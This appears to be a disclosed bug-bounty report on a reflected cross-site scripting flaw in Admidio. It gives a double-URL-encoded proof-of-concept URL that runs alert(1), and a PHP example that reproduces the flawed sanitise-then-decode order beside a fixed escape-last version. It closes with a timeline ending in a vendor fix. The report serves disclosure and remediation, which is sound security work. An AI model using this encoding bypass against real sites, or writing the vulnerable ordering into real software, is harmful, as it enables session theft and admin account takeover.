Cross-site Scripting (XSS) - Reflected in admidio/admidio

Valid

Reported on

Oct 18th 2021


Description

It is possible to perform reflected XSS by using double URL encoding when retrieving files.

Proof of Concept

Trigger XSS via

http://10.0.2.15/admidio/adm_program/modules/documents-files/documents_files_function.php?mode=6&folder_id=1&name=%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e

Impact

It is possible to trick admin users into visiting the malicious link, which executes the XSS and allows cookies to be stolen. It is also possible to execute actions as the admin user via malicious JavaScript.

Occurrences

HTML sanitisation should be done after all input has been transformed.
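The ordering problem described above, as an added example that is not admidio's code: the helper names and the use of `strip_tags` followed by a second `urldecode` are assumptions chosen to reproduce the sanitise-then-transform order, and the input is the `name` value from the proof-of-concept URL.

```php
<?php
declare(strict_types=1);

// Constructed input: the `name` value from the PoC URL, exactly as sent on the wire.
$wire = '%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e';

// PHP URL-decodes query parameters once while filling $_GET; simulate that step.
// The result is still percent-encoded once, so no "<" or ">" is visible yet.
$name = urldecode($wire);

/** Assumed vulnerable ordering (hypothetical helper): sanitise first, transform afterwards. */
function renderSanitiseThenDecode(string $value): string
{
    $clean = strip_tags($value);   // finds no tags in the encoded text, removes nothing
    return urldecode($clean);      // the second decode brings the markup back
}

/** Hardened ordering (hypothetical helper): finish every transform, then encode for HTML output. */
function renderDecodeThenEscape(string $value): string
{
    $decoded = urldecode($value);
    return htmlspecialchars($decoded, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Optional input check (hypothetical helper): true when a value is still
 * percent-encoded after PHP's own decode. A literal "+" also triggers it,
 * because urldecode() turns "+" into a space.
 */
function isStillEncoded(string $value): bool
{
    return urldecode($value) !== $value;
}

$unsafe = renderSanitiseThenDecode($name);
$safe   = renderDecodeThenEscape($name);

printf("after \$_GET decode : %s\n", $name);
printf("sanitise -> decode : %s\n", $unsafe);
printf("decode -> escape   : %s\n", $safe);
printf("raw '<' in output, sanitise-first order: %s\n", strpos($unsafe, '<') !== false ? 'yes' : 'no');
printf("raw '<' in output, escape-last order   : %s\n", strpos($safe, '<') !== false ? 'yes' : 'no');
printf("still encoded after first decode       : %s\n", isStillEncoded($name) ? 'yes' : 'no');
```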

We have contacted a member of the admidio team and are waiting to hear back 2 years ago
haxatron modified the report 2 years ago
Markus Faßbender validated this vulnerability 2 years ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Markus Faßbender marked this as fixed with commit 01a83d 2 years ago
Markus Faßbender has been awarded the fix bounty
This vulnerability will not receive a CVE